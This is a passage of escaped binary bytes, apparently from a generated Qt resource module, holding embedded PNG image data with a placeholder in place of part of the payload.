7\\xde\\x35\\x92\\\n\\xf9\\x73\\x64\\x7d\\xbe\\x92\\xd7\\xc4\\xc2\\x4e\\x00\\xc9\\x20\\x44\\xb3\\xef\\\n\\x78\\xa1\\xfa\\x91\\x00\\x51\\x07\\x99\\x32\\xf9\\x6f\\xc0\\x90\\x5d\\x9b\\xfd\\\n\\x1a\\xd3\\xe7\\x48\\xff\\xf4\\x25\\x1c\\x38\\x70\\xa0\\xad\\x80\\x25\\x47\\x89\\\n\\x85\\xcf\\x01\\xf8\\x10\\xc0\\x9b\\x00\\x0e\\x03\\xf0\\x46\\x7a\\xd1\\xe7\\x12\\\n\\x7e\\x8a\\x92\\x92\\x12\\x00\\x1d\\x12\\x0b\\x3f\\x0e\\x63\\x4d\\x0b\\xa1\\xda\\\n\\x7b\\x5d\\x62\\x61\\xea\\x6a\\x2d\\xfa\\x3b\\xc5\\x2c\\xfd\\xd9\\x94\\x91\\x30\\\n\\x27\\x27\\x87\\x39\\x80\\x03\\x4a\\x9e\\xea\\x50\\x41\\x96\\xb3\\x88\\x38\\xda\\\n\\xff\\x13\\xf1\\x4b\\xe0\\xe9\\x96\\xfe\\x6d\\x00\\x02\\xed\\x52\\xed\\x0b\\x9f\\\n\\x69\\x34\\x42\\x98\\x9b\\x9b\\x8b\\xf2\\x51\\x8b\\x98\\x3f\\xc7\\x97\\xc7\\x8f\\\n\\x85\\xac\\x20\\xdb\\x49\\xb9\\xee\\x0b\\x30\\xf6\\x44\\x82\\x0c\\x60\\x08\\x80\\\n\\x69\\xfe\\x61\\x69\\x8f\\x41\\xbc\\xff\\x64\\x53\\xc8\\x6c\\xe0\\x41\\x20\\x0a\\\n\\x9f\\x69\\x84\\x32\\x95\\x77\\xb4\\xa0\\xa0\\x00\\xef\\xde\\xf2\\x34\\xf3\\xe7\\\n\\x38\\x5b\\x30\\xbc\\xcb\\x0a\\xb2\\xc9\\x9b\\xab\\x95\\x86\\xd9\\x19\\x2e\\x0a\\\n\\xec\\x51\\x28\\x4d\\x00\\x90\\x2c\\x11\\x32\\x5e\\x02\\x12\\xe1\\xab\\x68\\x6b\\\n\\xc4\\xcb\\x35\\xd9\\x0f\\x60\\x00\\xfe\\x6e\\x47\\xe5\\x27\\x0f\\x9d\\xc5\\xfe\\\n\\xe3\\x5f\\x77\\xfa\\xf7\\xc2\\x67\\x1a\\x65\\x91\\xb0\\xa8\\xa8\\x48\\x53\\x43\\\n\\x76\\x4f\\xf5\\xf9\\xbc\\x9b\\x90\\x96\\x96\\x76\\xc3\\xcf\\x25\\x6f\\xae\\x56\\\n\\x2e\\x7b\\x15\\xd7\\x65\\xaf\\x72\\xa8\\x59\\x55\\xf7\\x53\\x4a\\x8d\\x4e\\x41\\\n\\x1f\\xf1\\xfc\\x74\\xe3\\xe1\\x5a\\xd8\\xed\\xf
6\\x4e\\xff\\xfe\\x5a\\x51\\xa6\\\n\\xf0\\x99\\x46\\x0b\\x84\\x1b\\x36\\x6c\\xc0\\xaf\\x5c\\xf7\\x30\\x7f\\x8e\\xbd\\\n\\x8f\\xda\\xdb\\xea\\xc5\\x87\\xa3\\xf3\\x2d\\x8a\\xd2\\xe4\\x55\\xbe\\x23\\x94\\\n\\xec\\x21\\x60\\x92\\x82\\xbe\\xc7\\x20\\xba\\x8b\\x4b\\xc3\\xaa\\x17\\xcf\\x59\\\n\\x29\\x36\\x53\\xfa\\x4c\\xb9\\x87\\xb0\\xac\\xac\\x0c\\xbf\\xfc\\x72\\x10\\xf3\\\n\\xe7\\xd8\\x31\\xd5\\xd3\\xed\\x0a\\xb2\\xe3\\x3f\\xfa\\x2b\\xed\\x13\\x1b\\x73\\\n\\x25\\x4e\\x96\\x6a\\x24\\x02\\x56\\x29\\xe8\\xbb\\x0d\\x62\\xfd\\xb2\\xf5\\x61\\\n\\x45\\x7b\\x4e\\x41\\x34\\x9d\\xcf\\x94\\x6b\\x08\\xab\\xaa\\xaa\\x0c\\xf3\\x83\\\n\\x76\\xa5\\xae\\xea\\xc5\\xdf\\x48\\x43\\xb6\\x1d\\x54\\x65\\x02\\xd6\\x29\\xe8\\\n\\xc3\\x06\\xf1\\xab\\x17\\xd7\\x74\\x2b\\xda\\x73\\x0a\\xa2\\xa9\\xf6\\x10\\xb9\\\n\\x85\\xb0\\xb6\\xb6\\x16\\x53\\xb6\\x37\\x33\\x7f\\x8e\\x70\\xea\\xc5\\x87\\x33\\\n\\x3f\\x84\\x09\\x5c\\x35\\x87\\xff\\x79\\x45\\x44\\xf5\\xe2\\x05\\x88\\x16\\x82\\\n\\xb0\\xae\\xae\\x8e\\x99\\x1f\\x34\\x58\\xaf\\xf4\\xde\\x17\\x76\\xbd\\x78\\xb3\\\n\\x83\\x58\\x3e\\xfb\\x39\\x64\\x66\\x66\\x46\\x7c\\x03\\x01\\x62\\x0f\\x26\\xb2\\\n\\xbc\\x39\\x66\\x5c\\x2e\\x17\\x06\\xc5\\x99\\x55\\x53\\x00\\x00\\x05\\x11\\x49\\\n\\x44\\x41\\x54\\x14\\x1d\\x65\\xfe\\x1c\\xff\\xe2\\xd9\\x86\\xb5\\x6b\\xd7\\x6a\\\n\\x7e\\x5d\\x8e\\x5c\\x35\\x1d\\x40\\xf1\\xbf\\x28\\x34\\xd1\\x75\\xae\\x1a\\x56\\\n\\xed\\xec\\xb4\\xbd\\x12\\xe0\\x6a\\x2d\\xca\\xe4\\xc2\\x55\\xc3\\x55\\x24\\xf4\\\n\\x78\\x3c\\x18\\xfa\\x14\\xfb\\xd2\\xc9\\x0f\\x9d\\x78\\x5d\\x17\\x00\\x79\\x8f\\\n\\x88\\x5a\\x96\\x63\\x13\\x11\\xd1\\x84\\x10\\x2a\\x8a\\x02\\xa7\\xd3\\x89\\x2b\\\n\\x77\\xff\\x82\\xe9\\x73\\xfc\\xec\\xaf\\xaf\\x46\\x5c\\x2f\\xbe\\x2b\\xb9\\xdd\\\n\\x6e\\x1c\\x69\\x6c\\xe2\\xd2\\xf0\\x4d\\x81\\xe4\\x1f\\x66\\x65\\x48\\x3a\\x82\\\n\\xb8\\x47\\x80\\xc8\\x31\\x84\\x39\\x39\\x39\\xa8\\xf9\\xf9\\x6f\\x98\\x3e\\xc3\\\n\\xed\\xdb\\x16\\xa0\\xbc\\xbc\\x5c\\xd7\\x7b\\x4c\\x98\\x30\\x01\\x63\\x92\\x12\\\n\\x3b\\x1d\\x12\\x32\\x02\\xd1\\x49\\x81\\x6c\\x95\\xd2\\xa1\\x57\\xbd\\xad\\x9a\\\n\\xba\\xa8\\xda\\x81\\x48\\x69\\x29\\x28\\xdd\\x07\\xa0\\x11\\x3f\\x66\\x8c\\x63\\\n\\x09\\xa2\\x53\\x05\\x92\\x13\\x16\\x57\\x48\\x51\\x0f\\x21\\x2f\\x7e\\xd0\\xc3\\\n\\x87\\x0f\\xb7\\x33\\x64\\x6b\\xad\\xec\\xec\\x6c\\x7c\\x36\\x2c\\xb1\\xab\\xb9\\\n\\x0a\\xcb\\x7d\\xc4\\x31\\x00\\xc6\\xd8\\x65\\xb9\\xff\\xb9\\x59\\x19\\xb2\\xd6\\\n\\x20\\xca\\xaa\\xe2\\x92\\x15\\xef\\x5e\\x42\\xd5\\x72\\x50\\x7a\\x06\\xec\\xec\\\n\\x64\\x6d\\x2f\\x1e\\xf8\\xbc\\xb5\\x43\\xbc\\x6c\\xe6\\xa9\\xfc\\x40\\x58\\x58\\\n\\x58\\xc8\\x85\\x1f\\xf4\\xdc\\xe2\\xd1\\x5d\\x5a\\xb4\\x22\\x55\\x7e\\x7e\\x3e\\\n\\x36\\xf6\\xba\\xd4\\xe5\\xa2\\x01\\x05\\x4a\\x29\\xc0\\x22\\x52\\xc4\\x10\\x60\\\n\\xb0\\x44\\x48\\x56\\xac\\x4c\\x26\\xc5\\x10\\x6d\\xe7\\x87\\x00\\xe0\\x5d\\x95\\\n\\xa5\\xc8\\x5e\\xcf\\x79\\x00\\x47\\x40\\xc8\\x11\\xf0\\x61\\xf8\\x1e\\x0d\\x60\\\n\\x34\\xeb\\x61\\x29\\x53\\x08\\x8b\\x8a\\x8a\\xb0\\x46\\x7a\\x80\\x39\\x80\\x67\\\n\\x0b\\x86\\xc3\\xe1\\x70\\xe8\\xfa\\xa2\\x09\\x54\\xcb\\xed\\x6c\\x4a\\xdc\\x4a\\\n\\xe1\\x6a\\x51\\xe8\\x5e\\x95\\xd2\\x72\\x0a\\x18\\x1d\\x29\\x08\\x80\\x24\\x02\\\n\\x4c\\x24\\x3a\\x2d\\xd4\\x00\\x00\\xe2\\xec\\xad\\x54\\x92\\x4f\\x01\\xf8\\x18\\\n\\x6c\\xb2\\xd4\\x5d\\x0f\\x62\\xdb\\x49\\x13\\x96\\x20\\x32\\x83\\x90\\x17\\x3f\\\n\\x68\\xb8\\x86\\xec\\x9e\\xaa\\xb8\\xb8\\xb8\\x43\\xb5\\xdc\\x4e\\x42\\x91\\xe2\\\n\\x56\\x14\\x5f\\xa4\\xf0\\xfd\\x30\\xab\\x00\\x05\\x9d\\x40\\xf4\\xac\\x9a\\xc6\\\n\\x93\\xe1\\x3b\\xf8\\xa4\\x09\\xd3\\x85\\x1a\\x26\\x10\\xf2\\xe2\\x07\\xad\
[binary payload omitted: JSON-escaped byte stream from a pyrcc-compiled Qt resource module (qt_resource_data). This portion concatenates several length-prefixed PNG images, including a 588x170 PNG tagged "Software: Adobe ImageReady" and a 225x225 PNG tagged "Comment: Created with GIMP"; the raw escaped bytes carry no further human-readable content.]
xa0\\x6f\\\n\\xb3\\xb1\\x1b\\xc0\\x56\\x00\\xf5\\x04\\x6c\\x2b\\xd1\\xb4\\x9d\\x84\\x69\\xfb\\\n\\x00\\xec\\xec\\x35\\x39\\x60\\xfd\\x31\\x65\\x7d\\x41\\x5c\\x0c\\x60\\x49\\x00\\\n\\x0c\\x15\\x48\\x71\\x95\\x79\\x06\\x55\\x67\\xc5\\xc5\\xc5\\x3a\\x80\\x51\\xb4\\\n\\x07\\x1b\\xca\\xee\\x02\\x90\\x61\\xf4\\x90\\x32\\x00\\xb8\\x4e\\xdd\\x76\\x6d\\\n\\xc4\\xe5\\x1d\\x30\\x12\\xfa\\x35\\x06\\x17\\x01\\x51\\x19\\x1c\\x0c\\xcc\\xc9\\\n\\x40\\x28\\x49\\x1c\\x00\\x45\\x99\\x01\\xbd\\xe8\\x6c\\x05\\x00\\xf5\\x84\\x69\\\n\\xad\\x54\\xd5\\x7c\\xdd\\x49\\x8e\\x4e\\x01\\xa2\\x42\\xa0\\x6b\\x96\\x65\\x8c\\\n\\x4f\\x47\\x18\\x8d\\x93\\x0c\\x76\\xc2\\xa6\\xa4\\xa4\\x04\\xcf\\x76\\x7e\\x11\\\n\\x69\\x9d\\xd8\\x59\\x76\\x6a\\x94\\x79\\xa2\\xd1\\x0b\\x38\\x1a\\x4d\\x97\\x74\\\n\\x40\\x08\\x35\\x10\\x30\\x86\\x6e\\x0a\\xd2\\x49\\x41\\x3a\\x49\\x94\\x33\\x3f\\\n\\x12\\x40\\x3e\\x75\\xc0\\x08\\x6d\\x25\\xd4\\xa1\\x74\\x3b\\x93\\x98\\x03\\x50\\\n\\x54\\x31\\x1a\\x23\\x01\\xe0\\x80\\x7e\\x88\\x69\\x76\\x9f\\xcf\\x8d\\x0a\\xc4\\\n\\xf2\\xf2\\x72\\x3c\\xea\\xfd\\x30\\xda\\xba\\xb1\\xab\\xec\\xc4\\x80\\x70\\x42\\\n\\xa0\\x2b\\x0e\\xb0\\x93\\xa6\\x75\\x47\\x0b\\x77\\x34\\x32\\x10\\xa8\\x0e\\x82\\\n\\x2e\\xa2\\xa7\\x13\\x57\\x2d\\x08\\xf7\\x7d\\xfb\\xfe\\x12\\xc0\\x10\\xeb\\x71\\\n\\xdd\\xd4\\xc1\\xa0\\x57\\x14\\x73\\x84\\xfe\\xbd\\x16\\xa3\\x0e\\xad\\x78\\x66\\\n\\xe1\\xba\\xa7\\x37\\x46\\xd3\\x35\\xdd\\xb0\\x61\\x03\\xee\\x6d\\xda\\x62\\xca\\\n\\x8b\\xda\\xa2\\x72\\x07\\xba\\xa4\\x23\\xfa\\xf4\\x00\\xcc\\x9b\\x98\\x21\\xfa\\\n\\x7f\\x98\\x85\\x0d\\xcf\\xb2\\xbd\\x5c\\xb1\\x0a\\xa0\\xda\\xa7\\x71\\x05\\x40\\\n\\x0c\\x8a\\x88\\xcc\\x98\\x3d\\xb4\\x6b\\x61\\x7b\\x50\\x6b\\x89\\xd5\\xd5\\xd5\\\n\\x58\\xfa\\xf6\\x5f\\x86\\x5a\\x57\\x76\\x45\\x44\\x8a\\x41\\x24\\xab\\x72\\x42\\\n\\x2c\\x59\\xba\\xab\\xd9\\x55\\xb6\\x83\\xa8\\x20\\x31\\x0f\\x60\\x18\\x10\\xed\\\n\\x5e\\xd8\\x8e\\x0a\\x44\\x8f\\xc7\\x83\\xeb\\x5e\\x7a\\xd2\\xac\\x3a\\x0b\\xc8\\\n\\x6e\\x9b\\x5b\\x4c\\x41\\x68\\x69\\x7e\\x8f\\xd4\\x5f\\xbf\\x4c\\xd9\\xf0\\x51\\\n\\x29\\x70\\x38\\xdd\\xf1\\x00\\x60\\x5f\\x10\\x35\\xdd\\xbc\\x10\\x80\\xf0\\x6b\\\n\\x03\\x48\\x11\\x96\\x30\\xfa\\x80\\xb8\\x43\\xf1\\x57\\xdc\\xc0\\x1a\\x1a\\x1a\\\n\\x90\\xfb\\x9f\\xab\\xcc\\xae\\x3b\\xbb\\x7b\\x03\\x31\\x05\\xa1\\x65\\x99\\xae\\\n\\x86\\xff\\xf6\\x35\\xc2\\x3a\\x4f\\xbb\\x34\\x57\\xca\\x08\\x68\\x7e\\x37\\xa8\\\n\\x63\\x2e\\x08\\xb9\\x21\\x1e\\x00\\x0c\\x06\\x31\\x05\\xf0\\x75\\x01\\x6d\\x9a\\\n\\x18\\x0b\\xdb\\xfd\\x82\\xc8\\x54\\xd5\\x9b\\xfa\\xeb\\x97\\x95\\x96\\xb6\\xf5\\\n\\x1a\\xa7\\x3a\\x14\\xc1\\xe6\\x26\\x3c\\x84\\x16\\xce\\x80\\xee\\x20\\x2c\\x65\\\n\\x44\\x32\\xa1\\x8e\\xd1\\x04\\xda\\x15\\xfa\\x83\\x61\\x79\\x00\\xc9\\x15\\xe0\\\n\\xe1\\x98\\x02\\x60\\x40\\x8a\\x31\\xb9\\xe5\\x00\\x3a\\x55\\x31\\x16\\xb6\\x2f\\\n\\x06\\x91\\x31\\x07\\x34\\xff\\x7e\\x8d\\x69\\xde\\xec\\x91\\x2b\\xce\\x91\\x61\\\n\\xe9\\xfe\\x6f\\x4e\\xac\\x65\\x26\\xd7\\xa5\\x08\\xbd\\x01\\xa1\\x21\\xb4\\x78\\\n\\x09\\x82\\xa4\\x80\\x3a\\xdd\\x24\\x29\\x75\\x1e\\x61\\xea\\x0f\\x18\\xa1\\xb3\\\n\\xa1\\x3b\\x1d\\xec\\xca\\x75\\x19\\x50\\xbf\\x19\\x01\\x06\\x03\\xe0\\x00\\xe3\\\n\\x44\\x51\\x40\\xcc\\xd7\\x03\\x36\\xb2\\xb4\\xa4\\x94\\x26\\x35\\x29\\xf5\\x73\\\n\\x96\\x34\\xec\\xdb\\x31\\x93\\xd6\\xf8\\x4e\\x7c\\xb9\\xda\\x1c\\x10\\x09\\xb1\\\n\\xda\\xe6\\x16\\x30\\xd1\\xd3\\x58\\x81\\xd0\\x9e\\x35\\x40\\x42\\xf2\\x18\\x75\\\n\\xfc\\x98\\x81\\x5e\\x0d\\x10\\x37\\x08\\x52\\x61\\x4f\\xd6\\x67\\xa3\\x0e\\x58\\\n\\x37\\x18\\x3a\\x00\\xe6\\x05\\xc8\\x87\\x20\\x64\\xbb\\x59\\x00\\xc6\\x00\\x88\\\n\\xc9\\x8c\\x3a
\\xc7\\x68\\x2e\\x7a\\x29\\x23\\x8e\\x0f\\x18\\x75\\xec\\x03\\x88\\\n\\x77\\xcc\\xa4\\x72\\xe5\\xc4\\x97\\xab\\x86\\xfe\\xfc\\xf5\\xdd\\x09\\x56\\xd9\\\n\\xdc\\x88\\xd1\\x8e\\x7a\\x96\\x29\\x4e\\xdd\\x76\\xad\\x1a\\xc9\\x30\\xca\\x99\\\n\\x50\\x00\\x06\\x26\\x60\\x08\\xc9\\x03\\x88\\x9d\\xe7\\x1f\\x04\\xea\\xc0\\x07\\\n\\xc6\\xda\\x88\\xa6\\x7e\\x45\\x98\\xd6\\xd4\\xd3\\x10\\x09\\xf1\\x9a\\x05\\xa0\\\n\\xc0\\x20\\x26\\x83\\x90\\x31\\x8c\\x3a\\xd3\\x18\\x58\\x16\\x40\\xd2\\x41\\x88\\\n\\x2b\\x30\\x61\\x63\\x1a\\x88\\xa1\\xdb\\x1b\\x8f\\xb2\\x13\\x5c\\xf0\\xcd\\x4e\\\n\\x00\\xf0\\x75\\xa4\\xae\\x19\\x67\\xc2\\x01\\x28\\xd6\\x04\\x8c\\x17\\x40\\x23\\\n\\xd1\\xba\\xeb\\x69\\xb7\\xaf\\x89\\x81\\x7e\\xce\\x92\\x86\\x7d\\x4b\\x1c\\x4e\\\n\\x9f\\x0a\\x62\\xfa\\xba\\xac\\x78\\x20\\x12\\x17\\x08\\xd2\\x00\\x72\\x29\\xf4\\\n\\x05\\xee\\xc0\\x0b\\x31\\x16\\x41\\x0c\\xe1\\x9a\\x41\\x44\\xae\\x19\\xa7\\x04\\\n\\xd0\\xee\\x97\\x10\\xd9\\x01\\x60\\x3f\\xed\\x52\\xbc\\xd4\\xaf\\x9c\\x23\\x5a\\\n\\xba\\xbf\\x73\\x78\\x06\\x37\\x63\\x84\\x60\\x20\\xc2\\x00\\x6f\\x18\\xfa\\x59\\\n\\xc2\\x88\\x21\\x10\\x07\\xed\\x9a\\x71\\x4a\\x00\\x6d\\x7e\\x09\\x11\\x52\\x0f\\\n\\xea\\xf2\\x52\\x42\\x15\\x25\\x6b\\xa2\\x66\\xc5\\x4d\\x84\\x01\\xd1\\xae\\x85\\\n\\xed\\xb0\\x6b\\x89\\x16\\x82\\x68\\xc6\\x10\\x25\\x6a\\xd7\\x0c\\xb5\\xa8\\xe1\\\n\\x69\\x90\\x3e\\xd0\\x7e\\x5f\\x42\\xc4\\xe1\\xe8\\x54\\x46\\x8e\\xd6\\xac\\xbc\\\n\\x99\\x10\\x7e\\xd3\\xad\\x00\\x76\\x41\\xdf\\x25\\xde\\x06\\x44\\xb7\\x31\\x95\\\n\\x03\\x88\\xbd\\xfc\\xa6\\x63\\x26\\x95\\x9b\\xf6\\xdc\\xda\\x1e\\xdf\\x7c\\xd1\\\n\\xb3\\x60\\xc0\\x6e\\x06\\x7c\\xcd\\x80\\xb3\\xec\\xc2\\x2c\\xaa\\x65\\x5d\\x01\\\n\\xde\\x0d\\xaf\\xcb\\x78\\xa8\\x87\\x8c\\x87\\xbc\\x55\\x02\\xd8\\x77\\x09\\x82\\\n\\x30\\x3b\\x6e\\x2a\\x04\\x88\\x35\\x00\\x6a\\x21\\xce\\xbe\\x44\\xd3\\x41\\x3c\\\n\\xf2\\xc8\\x73\\xc8\\xc9\\xc9\\x81\\xd1\\xee\\x14\\xe8\\xce\\xa2\\x3a\\x8d\\xe1\\\n\\xef\\xdd\\x1a\\xdb\\xa1\\x32\\x76\\x00\\x7a\\xb6\\x02\\xcb\\x5e\\x42\\xd4\\x8a\\\n\\x86\\xc7\\x80\\x3d\\x1a\\x50\\xcb\\xfa\\x3c\\x60\\x09\\xa0\\xb9\\x33\\xa0\\x83\\\n\\xd1\\xbf\\x65\\xed\\x67\\x0e\\x40\\x21\\xbd\\x41\\xac\\x89\\x47\\x10\\x1b\\x7f\\\n\\x53\\x8e\\x39\\x73\\xe6\\xf4\\xfc\\xff\\xa8\\xd7\\xea\\x18\\x03\\x14\\x95\\xa1\\\n\\xd5\\xa7\\x6a\\x75\\x3e\\x4d\\xab\\x51\\x19\\xab\\x61\\x16\\x97\\xdd\\x69\\x41\\\n\\xc3\\xdb\\xcb\\x80\\x77\\x34\\xc6\\x9a\\x08\\xd0\\x42\\x09\\x39\\x4d\\x4c\\xf4\\\n\\x81\\xa6\\x96\\x79\\x48\\x17\\x40\\x35\\x7d\\x1c\\x13\\xc8\\x7e\\x25\\x01\\x8c\\\n\\x40\\xbf\\x53\\x6a\\x50\\x56\\xb6\\x1e\\x65\\x00\\x4b\\x2d\\xf3\\xc4\\x84\\xcd\\\n\\x4d\\x03\\x6b\\x1d\\x3b\\xf1\\x31\\xe5\\xf8\\x91\\x3f\\x46\\x55\\x77\\xdb\\x96\\\n\\xdd\\x87\\xe5\\x85\\x85\\x17\\x7d\\x3f\\xf3\\xb5\\x3a\\x76\\xe4\\xa7\\xd7\\xf8\\\n\\x3a\\xfd\\xea\\x71\\x97\\x83\\x9c\\x73\\x51\\x72\\x82\\xe8\\x3d\\x37\\xc5\\xaa\\\n\\xb2\\x3b\\x2d\\x68\\x78\\xdb\\xc0\\x50\\xaf\\x6a\\xf0\\xaa\\x60\\x8a\\x8b\\x12\\\n\\x6d\\x4c\\x95\\x39\\x00\\xea\\xd9\\xd0\\x90\\xcc\\xc4\\xca\\xc0\\x15\\x13\\x00\\\n\\xde\\x71\\xec\\x05\\xac\\xaf\\xac\\xec\\xf9\\x7f\\x23\\x2b\\x9a\\xea\\x2a\\xf3\\\n\\x88\\x6b\\x73\\x03\\x08\\x18\\xab\\x67\\x9a\\xea\\x1d\\x3b\\x7e\\x95\\xe2\\x74\\\n\\xb8\\xb4\\x96\\x08\\x60\\xac\\xba\\xf1\\x1e\\xac\\x5c\\xbe\\xbc\\xdf\\x9f\\x1b\\\n\\xf9\\x69\\xbb\\x0e\\x2f\\x99\\xff\\x9d\\x93\\x10\\x85\\xe8\\xcf\\x4d\\xb5\\xaa\\\n\\xec\\x4e\\x2b\\x1a\\x1e\\x21\\x68\\x75\\x50\\xa2\\x8c\\xab\\xaa\\xe7\\x74\\x26\\\n\\x20\\xa6\\x43\\xcf\\x84\\x26\\x8a\\x49\\x57\\x68\\x00\\xaf\\xdd\\xfd\\x47\\x54\\\n\\xee\\xda\\x15\\xf2\\x67\\xfe\\x8a\\x42\\
xe6\\x2a\\xf3\\x88\\xe8\\xae\\xc9\\x03\\\n\\x40\\x19\\x90\\xa4\\x51\\x47\\x13\\xe0\\x68\\x51\\x29\\x3d\\x3d\\x66\\x52\\xb9\\\n\\x2f\\xdc\\xcc\\xe9\\x73\\xb3\\x6e\\xc6\\xea\\x95\\x2b\\x23\\xfa\\xb0\\xc9\\x35\\\n\\x7b\\xb5\\x93\\xcb\\xf2\\x3b\\x61\\x71\\xd9\\xa9\\x15\\x0d\\x8f\\x00\\xca\\xe8\\\n\\x2a\\xae\\xe3\\xbf\\x25\\xd0\\x93\\x0b\\x89\\x90\\x90\\xb7\\xdf\\x8c\\x00\\x22\\\n\\x00\\x38\\xe7\\x9d\\xdf\\xe3\\xfd\\xf7\\xdf\\x0f\\xfb\\x3b\\xfe\\x8a\\xc2\\xfe\\\n\\x76\\xea\\x0b\\x30\\x46\\x24\\x4b\\x18\\xa1\\x8b\\x19\\xa5\\xf9\\x0c\\x24\\xec\\\n\\x38\\x71\\xcd\\xf8\\x3c\\xac\\x5e\\xbd\\x3a\\xaa\\x0f\\xcb\\x0c\\x9a\\xb0\\xb1\\\n\\xaa\\xec\\x94\\x37\\x80\\xb0\\x2e\\x1b\\xda\\x14\\xd8\\x6b\\xc4\\x0e\\x64\\x04\\\n\\x68\\x83\\x3e\\xcd\\xdf\\x6b\\x26\\x58\\x04\\x00\\x01\\x60\\xe7\\xce\\x9d\\x70\\\n\\x38\\x1c\\x03\\xfe\\x9e\\xb0\\x20\\x12\\x72\\x0d\\x08\\x59\\x0c\\x90\\xc5\\xe1\\\n\\x26\\x6c\\x56\\x32\\x37\\x9e\\x79\\xe6\\x99\\x41\\x7d\\xd8\\x28\\x8b\\x41\\xa4\\\n\\x31\\x0e\\x60\\x60\\x02\\x26\\x1b\\xba\\xeb\\xc2\\x01\\x31\\x4e\\xeb\\xa9\\x0d\\\n\\x9e\\x61\\x14\\x05\\xc0\\x93\\x7f\\x98\\x83\\xd4\\xd4\\xd4\\x88\\x7f\\x5f\\x40\\\n\\x10\\x93\\x8c\\x17\\x6d\\x8e\\xf1\\xe2\\x5d\\x18\\x0a\\xc4\\xdb\\xda\\x53\\x51\\\n\\x55\\x55\\x35\\xa4\\x0f\\xb3\\x12\\x44\\x67\\x1c\\x00\\x28\\xd2\\x04\\x4c\\xaf\\\n\\x8c\\x00\\x04\\x38\\x4d\\x01\\x9f\\x08\\x00\\x1e\\x2d\\x99\\x82\\x8c\\x8c\\x8c\\\n\\xa8\\xff\\x9d\\x80\\x63\\x44\\x82\\x30\\xd9\\xdc\\xc6\\x4c\\x2a\\x57\\x94\\x27\\\n\\xae\\xe3\\x75\\x0e\\x46\\x40\\xa6\\x9e\\xc6\\x4c\\x25\\x80\\xa6\\xbe\\x84\\x7a\\\n\\x5c\\x27\\x14\\x68\\x4b\\x16\\x04\\xc0\\x03\\xbf\\x18\\x83\\xec\\xec\\xec\\x41\\\n\\xff\\x7b\\xc1\\x22\\x62\\xa8\\x09\\x9b\\x5e\\x6b\\x89\\x29\\x7f\\x78\\xcf\\xb4\\\n\\xf6\\x10\\x22\\x22\\x06\\x9e\\xf1\\x21\\x63\\xe8\\xd1\\x35\\xd4\\xf2\\x53\\x09\\\n\\xa0\\xe9\\x2f\\xa1\\x16\\x07\\xd0\\x59\\xb3\\x40\\x51\\x15\\x01\\x00\\xfc\\xe0\\\n\\x96\\x54\\x4c\\x9f\\x3e\\x7d\\xc8\\xd7\\x09\\x03\\x62\\x4c\\xa6\\x55\\x1c\\x0a\\\n\\x88\\x0c\\xa8\\x35\\xcc\\x27\\x7b\\x42\\xbc\\x88\\x18\\xf4\\x93\\xa3\\x8d\\xac\\\n\\xfd\\xe6\\x43\\x28\\x7d\\xa0\\x03\\xbc\\x84\\x1c\\x80\\xf2\\xee\\xe2\\x64\\xf6\\\n\\x2f\\xef\\xa7\\xd8\\xcd\\x1f\\xb6\\xdf\\x08\\xe4\\xe7\\xe7\\x9b\\x76\\xbd\\x10\\\n\\x20\\x0a\\xed\\x37\\xe5\\x01\\x22\\x03\\x5a\\x35\\xc6\\xea\\x34\\xc6\\x6a\\x59\\\n\\x1f\\x67\\x11\\x03\\xba\\x19\\xd0\\xa5\\x31\\xd6\\xa5\\x32\\xa6\\xa9\\x11\\x1e\\\n\\xfe\\x19\\x11\\x84\\x0e\\x42\\x02\\xad\\xbd\\xab\\xbf\\xd9\\x3f\\x09\\xa0\\x0e\\\n\\x60\\xe3\\x2f\\xc6\\xb0\\x1f\\xd6\\xfa\\x6c\\x07\\xf0\\xa5\\x39\\xff\\x44\\x61\\\n\\x08\\x87\\x08\\x07\\x10\\x85\\xf6\\x9b\\x9a\\x0d\\x62\\x37\\x83\\xcf\\xa7\\xb1\\\n\\x36\\x55\\xc3\\xa7\\x60\\xbd\\xce\\x00\\x69\\x01\\x70\\xba\\x9b\\xb1\\xb6\\x2e\\\n\\x8d\\x9d\\x54\\x54\\x4d\\xe9\\x50\\x23\\xf3\\xe4\\x0f\\x38\\x31\\xf3\\xd5\\x4f\\\n\\xaf\\x21\\x97\\xb8\\x1c\\x4e\\x4a\\x88\\x13\\x04\\xdf\\x81\\x61\\x1f\\x08\\xda\\\n\\x00\\x1c\\x04\\x87\\x7c\\xa0\\xb1\\x6c\\x43\\xfb\\xaa\\x64\\x0a\\x9b\\xb0\\xfe\\\n\\x33\\xdb\\x01\\x7c\\xda\\x7d\\x10\\xcb\\x97\\xdf\\xcf\\xed\\xfa\\x7f\\xcb\\x3b\\\n\\xcd\\x6e\\xaf\\x4f\\x8f\\x89\\xb4\\x8a\\x1a\\x58\\x6b\\x52\\xe9\\x36\\xa5\\xeb\\\n\\xa9\\x22\\x53\\xda\\xa7\\xe1\\xf6\\x52\\xbf\\x5d\\x9a\\xdf\\x41\\x08\\x5a\\x00\\\n\\xd4\\x19\\xed\\x42\\x65\\x8c\\x4d\\xd2\\x18\\xfb\\xd2\\xa7\\xb1\\x96\\x4e\\x55\\\n\\x3b\\xdf\\xcd\\x4c\\x3a\\x8b\\x62\\x18\\xa5\\x84\\x51\\x24\\x11\\x10\\x07\\xd1\\\n\\x69\\x3f\\x0c\\xe0\\x1b\\x00\\xc7\\x61\\x72\\x3e\\xd0\\x58\\xb6\\xa1\\x1d\\x2b\\\n\\x9b\\xc5\\x46\\x57\\x7c\\x64\\x3b\\x80\\x8f\\xa5\\xed\\xc6\\xfd\\xf
7\\xaf\\xe6\\\n\\x76\\xfd\\x2d\\x5b\\xb6\\xe0\\xba\\x97\\x9e\\xc4\\x09\\x80\\x65\\x4f\\x2a\\x17\\\n\\xdd\\x6f\\xda\\x63\\x73\\x4b\\x7a\\x60\\x8b\\xe2\\x74\\xb8\\xb4\\x0e\\x93\\x60\\\n\\x1c\\x5d\\x75\\xd1\\xcc\\xa9\\x0a\\x60\\x06\\x01\\xf9\\x8e\\x12\\xd6\\x4e\\x01\\\n\\x3f\\x25\\x91\\xed\\x8e\\x19\\xf0\\xa4\\xde\\xb6\\x65\\xd7\\x12\\x30\\x6d\\x04\\\n\\x80\\xb1\\x00\\x49\\x21\\x40\\x3b\\x21\\x38\\x05\\x93\\xf3\\x81\\xc6\\xb2\\x0d\\\n\\xed\\xe4\\xaa\\xab\\xd9\\x25\\xe5\\x1f\\xda\\x0e\\xe0\\xef\\x94\\x1a\\xac\\x5f\\\n\\xbf\\x9e\\xdb\\xf5\\x1b\\x1a\\x1a\\x30\\xf1\\xf1\\xdf\\x5e\\x1c\\x1d\\x26\\x95\\\n\\x8b\\x34\